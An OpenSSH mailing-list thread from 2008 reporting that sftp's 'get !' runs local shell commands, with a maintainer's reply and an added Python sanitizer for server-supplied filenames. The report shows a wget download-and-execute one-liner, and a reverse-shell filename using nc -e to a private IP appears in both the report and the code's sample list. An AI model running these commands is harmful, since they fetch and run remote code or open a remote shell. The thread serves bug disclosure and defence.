Strange sftp input parameter handling, user assisted code execution?
Ben Lindstrom
mouring at eviladmin.org
Wed Jun 18 03:29:11 EST 2008
I would consider that the use of "get !ls" would be a client side bug in
escaping (I suspect it should be filed as a ticket in
bugzilla.mindrot.org). sftp should translate "get !ls" into either "get
\!ls" or into the quoted counterpart.
However, I'm not sure what this has to do with the server, since !
produces a local shell and has nothing to do with the remote server.
- Ben
On Tue, 17 Jun 2008, Roman Fiedler wrote:
> Hello list,
>
> I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
>
> sftp> get !xxxx
> /bin/bash: xxxx: command not found
> Shell exited with status 127
>
>
> sftp> get !/bin/ls -al
> total 2132
> drwxr-xr-x 4 admin users 4096 2008-06-17 16:33 .
> drwxr-xr-x 16 admin users 12288 2008-06-17 08:50 ..
> drwxr-xr-x 3 admin users 8 2008-05-21 18:38 gd
>
>
> sftp> get !wget http://10.255.255.2:1234/root ; chmod 0755 root ; ./root
> --16:54:37-- http://10.255.255.2:1234/root
> => `root'
> Connecting to 10.255.255.2:1234... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 123
>
> 100%[====================================>] 123 13.59B/s
> ETA 00:00
>
> 16:55:49 (7.08 B/s) - `root' saved [123/123]
>
> ./root: line 1: afdasfasf: command not found
> ./root: line 3: asdfa: command not found
> Shell exited with status 127
> sftp>
>
> On a Linux server I did not manage to create a file with a / in the
> name, but a manipulated server could return such filenames or other
> strategies do not need them, e.g.
> touch '!nc -e /bin/bash 10.255.255.2 1234' on the server side and trying
> to download is also a good one.
>
> Has someone observed this behavior?
> Is this just a strange thing but according to the specs or a bug?
>
> lg roman
> _______________________________________________
> openssh-unix-dev mailing list
> openssh-unix-dev at mindrot.org
> https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev
>
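An added example, not part of either message and not OpenSSH code: one way for a script that feeds server-supplied filenames to `sftp -b` to keep a leading `!` from reaching the client as the first character of an argument, in the spirit of the "quoted counterpart" suggested above. The function names and the allowlist are assumptions of this example; it relies on sftp accepting double-quoted paths and refuses any name it cannot pass through unchanged.

```python
import re

# Conservative allowlist for a single path component (an assumption of this
# example, not an sftp rule): no "/", quotes, backslash, glob or control chars.
SAFE_NAME = re.compile(r"[A-Za-z0-9 ._!+=@-]+")


def batch_get_line(name):
    """Return an sftp batch 'get' line for a server-supplied name, or None to refuse it."""
    if name in (".", "..") or not SAFE_NAME.fullmatch(name):
        return None
    # The "./" prefix keeps "!" (local shell escape) and "-" (option flag) from
    # being the first character of the argument; the double quotes keep names
    # with embedded spaces together as one argument.
    return f'get "./{name}"'


def build_batch(names):
    """Split a remote listing into safe batch lines and refused names."""
    lines, refused = [], []
    for name in names:
        line = batch_get_line(name)
        if line is None:
            refused.append(name)
        else:
            lines.append(line)
    return lines, refused


# Constructed listing, as a manipulated server might return it. The second
# entry is the filename quoted in the message above.
SAMPLE = [
    "report.txt",
    "!nc -e /bin/bash 10.255.255.2 1234",
    "!ls",
    "-r",
    "a\nb",
    "../etc/passwd",
]

if __name__ == "__main__":
    lines, refused = build_batch(SAMPLE)
    print("\n".join(lines))
    for name in refused:
        print("refused:", repr(name))
```

Refused names should be logged and reviewed rather than silently skipped, since a listing that contains them is itself a sign of a hostile or misbehaving server.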